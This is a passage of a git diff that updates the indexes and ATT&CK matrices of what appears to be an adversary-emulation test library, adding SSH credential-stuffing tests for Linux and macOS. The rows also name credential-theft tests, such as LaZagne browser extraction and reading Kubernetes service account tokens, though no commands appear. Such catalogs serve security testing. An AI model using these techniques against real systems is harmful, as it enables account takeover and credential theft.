001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e9d78206..d701f7c6 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -5,6 +5,8 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b- credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell +credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash +credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index c9e1bb22..cd372f79 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh +credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 721cf97b..e9e50ace 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -1,5 +1,6 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bd9b1af6..586ecb2f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -15,7 +15,9 @@ - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #1: SSH Credential Stuffing From Linux [linux] + - Atomic Test #2: SSH Credential Stuffing From MacOS [macos] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] - Atomic Test #2: Extract passwords with grep [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 678b261a..7df32bb9 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -11,7 +11,8 @@ - [T1552.007 Container API](../../T1552.007/T1552.007.md) - Atomic Test #1: ListSecrets [macos, linux] - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #1: SSH Credential Stuffing From Linux [linux] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #2: Extract passwords with grep [macos, linux] - Atomic Test #5: Find and Access Github Credentials [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 215f549a..65e062d0 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -4,7 +4,8 @@ - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #2: SSH Credential Stuffing From MacOS [macos] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] - Atomic Test #2: Extract passwords with grep [macos, linux] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 33891a6e..a6c4f9c7 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -7,7 +7,7 @@ | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index b4352dce..9d447e38 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md @@ -4,7 +4,7 @@ | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index acd405f4..bdd2eed9 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -10,7 +10,7 @@ | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A 